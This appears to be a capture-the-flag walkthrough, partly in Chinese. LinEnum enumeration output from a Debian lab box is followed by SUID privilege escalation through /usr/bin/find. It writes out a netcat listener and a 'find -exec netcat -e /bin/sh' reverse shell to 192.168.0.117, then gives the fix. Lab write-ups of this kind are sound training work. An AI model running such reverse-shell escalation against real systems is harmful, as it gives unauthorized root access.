-rwxr-xr-x 1 root root 4322 Mar 14 2013 networking
-rwxr-xr-x 1 root root 6491 May 22 2013 nfs-common
-rwxr-xr-x 1 root root 1346 May 20 2012 procps
-rwxr-xr-x 1 root root 6120 Oct 16 2012 rc
-rwxr-xr-x 1 root root 782 Oct 16 2012 rc.local
-rwxr-xr-x 1 root root 117 Oct 16 2012 rcS
-rwxr-xr-x 1 root root 639 Oct 16 2012 reboot
-rwxr-xr-x 1 root root 2727 Sep 26 2016 restorecond
-rwxr-xr-x 1 root root 1074 Jul 15 2013 rmnologin
-rwxr-xr-x 1 root root 2344 May 10 2017 rpcbind
-rwxr-xr-x 1 root root 3054 Oct 8 2014 rsyslog
-rwxr-xr-x 1 root root 3200 Oct 16 2012 sendsigs
-rwxr-xr-x 1 root root 590 Oct 16 2012 single
-rw-r--r-- 1 root root 4290 Oct 16 2012 skeleton
-rwxr-xr-x 1 root root 3881 Apr 15 2016 ssh
-rwxr-xr-x 1 root root 8827 Nov 9 2012 udev
-rwxr-xr-x 1 root root 1179 Aug 20 2012 udev-mtab
-rwxr-xr-x 1 root root 2721 Apr 10 2013 umountfs
-rwxr-xr-x 1 root root 2195 Apr 10 2013 umountnfs.sh
-rwxr-xr-x 1 root root 1122 Oct 16 2012 umountroot
-rwxr-xr-x 1 root root 3111 Oct 16 2012 urandom
-rwxr-xr-x 1 root root 1364 Oct 26 2015 virtualbox-guest-utils
-rwxr-xr-x 1 root root 2666 Mar 3 2012 x11-common [00;31m[-] /etc/init/ config file permissions:[00m
total 48
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 01:08 ..
-rw-r--r-- 1 root root 523 Mar 14 2013 network-interface-container.conf
-rw-r--r-- 1 root root 1603 Mar 14 2013 network-interface-security.conf
-rw-r--r-- 1 root root 803 Mar 14 2013 network-interface.conf
-rw-r--r-- 1 root root 1898 Mar 14 2013 networking.conf
-rw-r--r-- 1 root root 567 Feb 24 2013 startpar-bridge.conf
-rw-r--r-- 1 root root 637 Nov 5 2012 udev-fallback-graphics.conf
-rw-r--r-- 1 root root 769 Nov 5 2012 udev-finish.conf
-rw-r--r-- 1 root root 322 Nov 5 2012 udev.conf
-rw-r--r-- 1 root root 356 Nov 5 2012 udevmonitor.conf
-rw-r--r-- 1 root root 352 Nov 5 2012 udevtrigger.conf [00;31m[-] /lib/systemd/* config file permissions:[00m
/lib/systemd/:
total 4.0K
drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system /lib/systemd/system:
total 56K
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants
-rw-r--r-- 1 root root 353 Feb 10 2015 dbus.service
-rw-r--r-- 1 root root 106 Feb 10 2015 dbus.socket
-rw-r--r-- 1 root root 190 Oct 8 2014 rsyslog.service
-rw-r--r-- 1 root root 164 Apr 29 2013 udev-control.socket
-rw-r--r-- 1 root root 177 Apr 29 2013 udev-kernel.socket
-rw-r--r-- 1 root root 752 Apr 29 2013 udev-settle.service
-rw-r--r-- 1 root root 291 Apr 29 2013 udev-trigger.service
-rw-r--r-- 1 root root 384 Apr 29 2013 udev.service
-rw-r--r-- 1 root root 155 Apr 16 2013 acpid.service
-rw-r--r-- 1 root root 115 Apr 16 2013 acpid.socket /lib/systemd/system/dbus.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket /lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Feb 10 2015 dbus.service -> ../dbus.service /lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket
lrwxrwxrwx 1 root root 22 Apr 29 2013 udev-control.socket -> ../udev-control.socket
lrwxrwxrwx 1 root root 21 Apr 29 2013 udev-kernel.socket -> ../udev-kernel.socket /lib/systemd/system/basic.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Apr 29 2013 udev-trigger.service -> ../udev-trigger.service
lrwxrwxrwx 1 root root 15 Apr 29 2013 udev.service -> ../udev.service [00;33m### SOFTWARE #############################################[00m
[00;31m[-] MYSQL version:[00m
mysql Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2 [00;31m[-] Apache user configuration:[00m
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data [00;33m### INTERESTING FILES ####################################[00m
[00;31m[-] Useful file locations:[00m
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl [00;31m[-] Installed compilers:[00m
ii checkpolicy 2.1.8-2 i386 SELinux policy compiler
ii gcc 4:4.7.2-1 i386 GNU C compiler
ii gcc-4.7 4.7.2-5 i386 GNU C compiler
ii gcc-4.7-multilib 4.7.2-5 i386 GNU C compiler (multilib files)
ii gcc-multilib 4:4.7.2-1 i386 GNU C compiler (multilib files) [00;31m[-] Can we read/write sensitive files:[00m
-rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd
-rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group
-rw-r--r-- 1 root root 851 Jul 30 2011 /etc/profile
-rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount
-rwsr-xr-x 1 root root 31104 Apr 13 2011 /bin/ping
-rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su
-rwsr-xr-x 1 root root 35252 Apr 13 2011 /bin/ping6
-rwsr-xr-x 1 root root 67704 Dec 10 2012 /bin/umount
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwsr-xr-x 1 root root 35892 Feb 27 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 30880 Feb 27 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44564 Feb 27 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 66196 Feb 27 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9660 Jun 20 2017 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 248036 Jan 27 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5412 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 321692 Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 84532 May 22 2013 /sbin/mount.nfs

[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find

[-] SGID files:
-rwxr-sr-x 1 root ssh 128396 Jan 27 2018 /usr/bin/ssh-agent
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwxr-sr-x 1 root mlocate 30492 Sep 25 2010 /usr/bin/mlocate
-rwxr-sr-x 1 root mail 17908 Nov 18 2017 /usr/bin/lockfile
-rwxr-sr-x 1 root shadow 49364 Feb 27 2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 9708 Jun 11 2012 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 9768 Nov 30 2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root tty 18020 Dec 10 2012 /usr/bin/wall
-rwxr-sr-x 1 root crontab 34760 Jul 4 2012 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 18168 Feb 27 2017 /usr/bin/expiry
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwxr-sr-x 1 root mail 13960 Dec 12 2012 /usr/bin/dotlockfile
-rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter
-rwxr-sr-x 1 root shadow 30332 May 5 2012 /sbin/unix_chkpwd [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was entered [-] Can't search *.ini files as no keyword was entered [00;31m[-] All *.conf files in /etc (recursive 1 level):[00m
-rw-r--r-- 1 root root 45 May 7 01:08 /etc/resolv.conf
-rw-r--r-- 1 root root 346 Mar 31 2012 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 216 Sep 26 2016 /etc/sestatus.conf
-rw-r--r-- 1 root root 1260 May 30 2008 /etc/ucf.conf
-rw-r--r-- 1 root root 834 Jun 8 2012 /etc/gssapi_mech.conf
-rw-r--r-- 1 root root 859 Nov 24 2012 /etc/insserv.conf
-rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf
-rw-r--r-- 1 root root 3173 Dec 16 2017 /etc/reportbug.conf
-rw-r--r-- 1 root root 599 Feb 19 2009 /etc/logrotate.conf
-rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 284 Sep 25 2010 /etc/updatedb.conf
-rw-r--r-- 1 root root 191 Feb 1 2012 /etc/libaudit.conf
-rw-r--r-- 1 root root 604 May 16 2012 /etc/deluser.conf
-rw-r--r-- 1 root root 2940 Feb 12 2016 /etc/gai.conf
-rw-r--r-- 1 root root 2632 Oct 8 2014 /etc/rsyslog.conf
-rw-r--r-- 1 root root 2082 May 20 2012 /etc/sysctl.conf
-rw-r--r-- 1 root root 214 May 11 2013 /etc/idmapd.conf
-rw-r--r-- 1 root root 956 Feb 22 2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 552 Apr 30 2012 /etc/pam.conf
-rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Dec 26 2012 /etc/debconf.conf
-rw-r--r-- 1 root root 9 Aug 8 2006 /etc/host.conf
-rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf
-rw-r--r-- 1 root root 475 Aug 29 2006 /etc/nsswitch.conf [00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m
/home/flag4/.bash_history
cd
ls
vi flag4.txt
ls
exit [00;31m[-] Any interesting mail in /var/mail:[00m
total 8
drwxrwsr-x 2 root mail 4096 Feb 19 22:24 .
drwxr-xr-x 12 root root 4096 Feb 19 23:10 .. [00;33m### SCAN COMPLETE ####################################[00m

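发现了弱点:LinEnum 的 "Possibly interesting SUID files" 一项列出了 /usr/bin/find,该文件属主为 root 且设置了 SUID 位(-rwsr-xr-x),因此 find 通过 -exec 启动的命令会以 root 的有效用户身份运行。据此尝试进行 SUID 提权。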

参考文章:https://pentestlab.blog/2017/09/25/suid-executables/

下面三条命令都用于列出系统中设置了 SUID 位的文件:

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

反弹shell

攻击机

root@panli:~# nc -lvvp 8999
listening on [any] 8999 ...

在meterpreter的shell中执行find suidtest -exec netcat -e /bin/sh  192.168.0.117 8999 \;

成功提权。根本原因是 /usr/bin/find 被设置了 SUID 位;修复方法是去掉该位(chmod u-s /usr/bin/find),并用上文的 find 命令定期审计系统中的 SUID 文件。
